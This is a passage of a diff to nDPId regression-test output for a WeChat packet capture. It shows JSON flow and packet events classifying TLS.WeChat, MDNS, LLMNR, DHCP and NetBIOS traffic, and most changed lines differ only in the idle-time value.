{"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1550,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167765657,"flow_last_seen":1492167777220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167911211,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58037,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00565{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","packets-captured":1553,"packets-processed":1552,"total-skipped-flows":0,"total-l4-data-len":556502,"total-not-detected-flows":0,"total-guessed-flows":15,"total-detected-flows":58,"total-detection-updates":63,"total-updates":4,"current-active-flows":30,"total-active-flows":76,"total-idle-flows":46,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":467,"global_ts_msec":1492171154216} -00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171154216,"flow_last_seen":1492171154216,"flow_idle_time":7440000,"flow_min_l4_payload_len":1188,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":1188,"flow_avg_l4_payload_len":1188,"midstream":1,"thread_ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54183,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-02086{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1492171154216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1254,"pkt_l4_len":1220,"thread_ts_msec":1492171154216,"pkt":"8IQvSpdgeJKcD6iOCABFAATYpoxAAEAGahTAqAFny82XotOnAbtQhl2xjWp\/PoAYBaSJeAAAAQEICgA\/OhBF4BL0FwMDBJ8AAAAAAAAAk06IK7tTPaQ0tnXGeqHKil75lMj6OyIERVlvQ89pkJ\/5uFrYubJHeJqSrynvitkot5qunWtMUvVbyI8vjd8zycM9IsUAAB\/fKHCxwAngzbmC6gdk\/UoKTL4MIPiK4NVVPRz1DsYhuoql6sqmFMKJKaM6NXpyBkCtYpvlazDCWxllWCP\/i12XdKQQMbcGYN2wvAB3a6vg6oJPIx+XXkk4cY\/+EENsi+PDerl+pB2IlJMObTfaJBhM\/rJFUKMd1xriphMBzgM9PCE+gKKP\/k+AYg8NddY\/gnJX\/+unfAflhC1NZ1nFt2\/\/Y9gesYC0uhG0uLLlbtLmKF2MPjllgxHAEeq6L2rXw2szIJL4yllp+t9tcKCYfzVRzCQkgUtQQaP0YiRh1NQtDTvnuPpM8CS6YfFOx17PkSNzepokWNsrLXMtr9p2nc9zczirZ\/D9H9Xey3Xx0qFAN\/MVzWUXfWpSlTWrXzNWP5kDdvTYBf19VGMPfxtzLKYTLOd\/rVswJ6OAUsAdfTYAu7j6c4KJubGecouom8T9brd1TJm6pyXignKkiQR+nvp0U\/G\/NxhEcnKV91SvFM0mQxh+hfK10svoh9dj1Bq8+PvXaAQljscptiwRlr+X\/V1zPyapTZcrW9A2fGrnzKqVYJASiCPQWyYD8Mn6pda0e6knRW3Ae28WpLnmyjMKx4\/7dOqugSoKa3q7BQRxbcpbcOXlPFfrjt+CwbA3KCTzFvdocE4QeSDn8FuJ85HFummmQOxK7tDtjljV+L\/2nbiMgjTy6jJzYFwXGw6xLdoXOupF5XjIfHUSMeB+R0BhUmtVxXEWPPHfAVdVJcBt8uO5QMhp9jxrSrOX54VXB+P7Qj0VmSag75Jhz20k8Z3uI27cFcp7OjdlKhlEBtlzESNSQ8FGkqCxygPJSf0REdvr2uQA0ApTgzzF+s6YbdeH3vy1SJOH2fQsH4IeYeRjAPrh1RmlhN066XBLLeGtIiz1LEJx17TCB8c1JpUan\/1+JYoV0SCzXlaZWYybCxcBBIz\/2EdpG8hJzN4rtTVwf\/3OYFkhRTMbe1PHW9T5IfuTuKU76wWlDp+aujzjWp1vvFdq4bUrI6AdEquAU5C3BTnuLB9tqzlOb5nzcQjb4fPQCkUUcvHBPPLW9qrLyB05aTRG1W9ShnsibG\/AerW39YgPMVulkynnwtbGsYcGZs7KelCQXCLt3D6RU08N5SulLgw+o5aYItue0wJaW5VDEXxAVhsE4KU4+QsEuXkbd9rTsMt9Gf+Td49H8NzJEXxlYX\/ThtsZsn5doQpcdUcGVMiJrwpHQzTDWZLiBcd51axsLca9fP61xaeKb48j0Kb0TeXy0DcAfEDH4Sy29YAuNi7N4uKdxMrzHsqaQhCFI\/jmx6CqCWjy1zA6Ijzjpx6KTEeNxn3m7OTzuxckZQeS0ArKR7BX7UnCFIAenlvKt7e\/DzO9W1DndidXP+Qwf3XzvB+q
venTl6HWA0XtGBky3MCwBE5b++HXnyFlygjOvbY7LPZovuQtASvUqwAHPkuONuar\/2ZEP2TwCB+AOJYrpZq+HLOc"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1554,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171154792,"flow_last_seen":1492171154792,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":54205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1554,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1492171154792,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171154792,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0MxpAAEAGXPXAqAFnQOmnvNO9AbuA1BLzAh8CfoAQAT0MFQAAAQEICgA\/OqCGKY\/Q"} +00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171154216,"flow_last_seen":1492171154216,"flow_idle_time":7560000,"flow_min_l4_payload_len":1188,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":1188,"flow_avg_l4_payload_len":1188,"midstream":1,"thread_ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54183,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+02086{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1492171154216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1254,"pkt_l4_len":1220,"thread_ts_msec":1492171154216,"pkt":"8IQvSpdgeJKcD6iOCABFAATYpoxAAEAGahTAqAFny82XotOnAbtQhl2xjWp\/PoAYBaSJeAAAAQEICgA\/OhBF4BL0FwMDBJ8AAAAAAAAAk06IK7tTPaQ0tnXGeqHKil75lMj6OyIERVlvQ89pkJ\/5uFrYubJHeJqSrynvitkot5qunWtMUvVbyI8vjd8zycM9IsUAAB\/fKHCxwAngzbmC6gdk\/UoKTL4MIPiK4NVVPRz1DsYhuoql6sqmFMKJKaM6NXpyBkCtYpvlazDCWxllWCP\/i12XdKQQMbcGYN2wvAB3a6vg6oJPIx+XXkk4cY\/+EENsi+PDerl+pB2IlJMObTfaJBhM\/rJFUKMd1xriphMBzgM9PCE+gKKP\/k+AYg8NddY\/gnJX\/+unfAflhC1NZ1nFt2\/\/Y9gesYC0uhG0uLLlbtLmKF2MPjllgxHAEeq6L2rXw2szIJL4yllp+t9tcKCYfzVRzCQkgUtQQaP0YiRh1NQtDTvnuPpM8CS6YfFOx17PkSNzepokWNsrLXMtr9p2nc9zczirZ\/D9H9Xey3Xx0qFAN\/MVzWUXfWpSlTWrXzNWP5kDdvTYBf19VGMPfxtzLKYTLOd\/rVswJ6OAUsAdfTYAu7j6c4KJubGecouom8T9brd1TJm6pyXignKkiQR+nvp0U\/G\/NxhEcnKV91SvFM0mQxh+hfK10svoh9dj1Bq8+PvXaAQljscptiwRlr+X\/V1zPyapTZcrW9A2fGrnzKqVYJASiCPQWyYD8Mn6pda0e6knRW3Ae28WpLnmyjMKx4\/7dOqugSoKa3q7BQRxbcpbcOXlPFfrjt+CwbA3KCTzFvdocE4QeSDn8FuJ85HFummmQOxK7tDtjljV+L\/2nbiMgjTy6jJzYFwXGw6xLdoXOupF5XjIfHUSMeB+R0BhUmtVxXEWPPHfAVdVJcBt8uO5QMhp9jxrSrOX54VXB+P7Qj0VmSag75Jhz20k8Z3uI27cFcp7OjdlKhlEBtlzESNSQ8FGkqCxygPJSf0REdvr2uQA0ApTgzzF+s6YbdeH3vy1SJOH2fQsH4IeYeRjAPrh1RmlhN066XBLLeGtIiz1LEJx17TCB8c1JpUan\/1+JYoV0SCzXlaZWYybCxcBBIz\/2EdpG8hJzN4rtTVwf\/3OYFkhRTMbe1PHW9T5IfuTuKU76wWlDp+aujzjWp1vvFdq4bUrI6AdEquAU5C3BTnuLB9tqzlOb5nzcQjb4fPQCkUUcvHBPPLW9qrLyB05aTRG1W9ShnsibG\/AerW39YgPMVulkynnwtbGsYcGZs7KelCQXCLt3D6RU08N5SulLgw+o5aYItue0wJaW5VDEXxAVhsE4KU4+QsEuXkbd9rTsMt9Gf+Td49H8NzJEXxlYX\/ThtsZsn5doQpcdUcGVMiJrwpHQzTDWZLiBcd51axsLca9fP61xaeKb48j0Kb0TeXy0DcAfEDH4Sy29YAuNi7N4uKdxMrzHsqaQhCFI\/jmx6CqCWjy1zA6Ijzjpx6KTEeNxn3m7OTzuxckZQeS0ArKR7BX7UnCFIAenlvKt7e\/DzO9W1DndidXP+Qwf3XzvB+q
venTl6HWA0XtGBky3MCwBE5b++HXnyFlygjOvbY7LPZovuQtASvUqwAHPkuONuar\/2ZEP2TwCB+AOJYrpZq+HLOc"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1554,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171154792,"flow_last_seen":1492171154792,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":54205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1554,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1492171154792,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171154792,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0MxpAAEAGXPXAqAFnQOmnvNO9AbuA1BLzAh8CfoAQAT0MFQAAAQEICgA\/OqCGKY\/Q"} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795095,"flow_last_seen":1492167795102,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50577,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167338426,"flow_last_seen":1492167781907,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167851002,"flow_last_seen":1492167851002,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 
@@ -480,12 +480,12 @@ 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1492167795292,"flow_last_seen":1492167796728,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167848542,"flow_last_seen":1492167848542,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795092,"flow_last_seen":1492167795103,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":49195,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1492167776953,"flow_last_seen":1492167815112,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":25818,"flow_avg_l4_payload_len":437,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1492167777204,"flow_last_seen":1492167918120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58039,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1492167777204,"flow_last_seen":1492167918120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58039,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1492167865975,"flow_last_seen":1492167896999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":21218,"flow_avg_l4_payload_len":433,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167866226,"flow_last_seen":1492167897002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1492167905310,"flow_last_seen":1492167916848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":8052,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1492167776953,"flow_last_seen":1492167815112,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":25818,"flow_avg_l4_payload_len":437,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1492167777204,"flow_last_seen":1492167918120,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58039,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1492167777204,"flow_last_seen":1492167918120,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58039,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1492167865975,"flow_last_seen":1492167896999,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":21218,"flow_avg_l4_payload_len":433,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
+00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167866226,"flow_last_seen":1492167897002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1492167905310,"flow_last_seen":1492167916848,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":8052,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167851203,"flow_last_seen":1492167851203,"flow_idle_time":120000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff86:6c5b","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1492167788126,"flow_last_seen":1492167911210,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167338426,"flow_last_seen":1492167781907,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 
@@ -495,54 +495,54 @@ 00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795090,"flow_last_seen":1492167795099,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":57401,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1492167788128,"flow_last_seen":1492167911211,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795091,"flow_last_seen":1492167795098,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50440,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
